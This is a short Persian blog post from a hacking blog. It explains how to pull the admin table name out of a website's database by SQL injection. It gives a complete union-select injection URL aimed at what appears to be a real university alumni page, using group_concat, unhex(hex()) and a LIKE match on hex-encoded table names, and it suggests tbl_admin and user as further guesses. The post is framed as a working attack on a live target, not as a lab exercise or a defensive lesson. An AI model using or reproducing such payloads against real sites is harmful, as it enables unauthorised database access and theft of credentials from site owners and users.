تبلیغات
Check Page Rank امنیت* هک * سیستم عامل * دانلود * و .... - نکته در مورد نمایش تیبل ادمین 2
 
امنیت* هک * سیستم عامل * دانلود * و ....
موفقیت از آن كسانی است كه منتظر دیگران نمی مانند
                                                        
درباره وبلاگ


مدیر وبلاگ : هکر تازه وارد
نویسندگان
آمار وبلاگ
  • کل بازدید :
  • بازدید امروز :
  • بازدید دیروز :
  • بازدید این ماه :
  • بازدید ماه قبل :
  • تعداد نویسندگان :
  • تعداد کل پست ها :
  • آخرین بازدید :
  • آخرین بروز رسانی :

به نام خدا

خوب دوستان زمانی که می خواهیم تیبل ادمین رو بیرون بکشیم ابتدا دستور group-concat رو به تنهای بکار می بریم اگر تیبل ادمین پیدا نشد ما از دستور unhex(hex()) استقاده می کنیم و اگر باز هم تیبل ادمین به نمایش در نیامد از دستور like به صورت زیر استفاده می کنیم.

https://dde.ptu.ac.in/alumni-detail.php?id=24%27+union+select+1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from

+information_schema.tables+where+table_name+like+0x6d656d62657273--+

 

 

خوب در اینجا ما چند تا اسم رو تست می کنیم با دستور لایک .

ابتدا ما تیبلی به اسم member رو هگز کرده و تست می کنیم اگر جواب داد که هیچ در اینصورت تیبل های دیگری مانند tbl_admin  و یا user و ...

این دستور لایک در واقع تیری در تاریکی است که در بعضی موارد جواب می دهد .





نوع مطلب : امنیت و تست نفوذ در سایت، 
برچسب ها :
لینک های مرتبط :




 
لبخندناراحتچشمک
نیشخندبغلسوال
قلبخجالتزبان
ماچتعجبعصبانی
عینکشیطانگریه
خندهقهقههخداحافظ
سبزقهرهورا
دستگلتفکر